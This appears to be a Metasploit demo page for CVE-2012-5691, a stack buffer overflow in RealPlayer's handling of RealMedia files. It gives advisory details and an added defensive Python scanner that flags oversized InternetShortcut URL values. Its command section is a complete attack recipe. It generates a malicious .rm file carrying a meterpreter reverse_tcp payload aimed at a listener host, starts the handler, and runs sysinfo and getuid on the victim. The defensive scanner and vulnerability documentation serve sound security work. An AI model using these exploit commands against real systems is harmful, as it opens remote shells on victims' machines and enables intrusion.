
CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability on 2012-12-14
Metasploit PoC provided on 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

RealPlayer version 15.0.5.109 and below

Tested on Windows XP Pro SP3 with :

RealPlayer 15.0.5.109

Description :

This module exploits a stack-based buffer overflow in RealPlayer versions prior to or equal to 15.0.6.14. The vulnerability exists in the handling of RealMedia files: the URL property of an InternetShortcut section is read with the GetPrivateProfileString function into a fixed-size stack buffer without a sufficient length check. This module generates a malicious .rm file which must be opened with RealPlayer, either by drag and drop or by double-clicking it.
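As an added defensive check, not part of the original post or of the Metasploit module: a small Python scanner that reads a file the way an INI parser (and thus GetPrivateProfileString) would, locates the URL property in the InternetShortcut section that the description says is handled unsafely, and flags an oversized value. The length threshold and the sample inputs are assumptions for illustration, since the page does not state the actual buffer size.

```python
import re

# Assumed threshold for illustration only; the page does not give the real
# size of the stack buffer that GetPrivateProfileString writes into.
MAX_SANE_URL_LEN = 1024

# INI syntax as seen by a Windows profile-string reader: [Section] headers
# and key=value lines, both matched case-insensitively below.
SECTION_RE = re.compile(rb"^\s*\[(?P<name>[^\]]+)\]\s*$")
KEY_RE = re.compile(rb"^\s*(?P<key>[^=\s]+)\s*=(?P<value>.*)$")


def ini_sections(data: bytes) -> dict:
    """Parse INI-style bytes into {section: {key: raw_value}} with
    lower-cased section and key names; values are kept raw."""
    sections = {}
    current = None
    for line in data.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            key = m.group("key").strip().lower()
            sections[current][key] = m.group("value").strip()
    return sections


def find_oversized_url(data: bytes, limit: int = MAX_SANE_URL_LEN):
    """Return (is_suspicious, url_length) for the body of an .rm file.
    A file with no [InternetShortcut] URL property is reported as clean."""
    shortcut = ini_sections(data).get(b"internetshortcut")
    if shortcut is None or b"url" not in shortcut:
        return False, 0
    length = len(shortcut[b"url"])
    return length > limit, length


# Constructed sample inputs (not real files captured from the wild).
BENIGN_RM = b"[InternetShortcut]\r\nURL=http://example.com/stream.rm\r\n"
SUSPICIOUS_RM = b"[InternetShortcut]\r\nURL=" + b"A" * 4000 + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RM), ("suspicious", SUSPICIOUS_RM)):
        flagged, n = find_oversized_url(blob)
        print(f"{name}: url_len={n} flagged={flagged}")
```

Pointing this at a quarantine or mail-gateway sample directory gives a cheap triage signal for files that carry a textual InternetShortcut block with an implausibly long URL.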

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid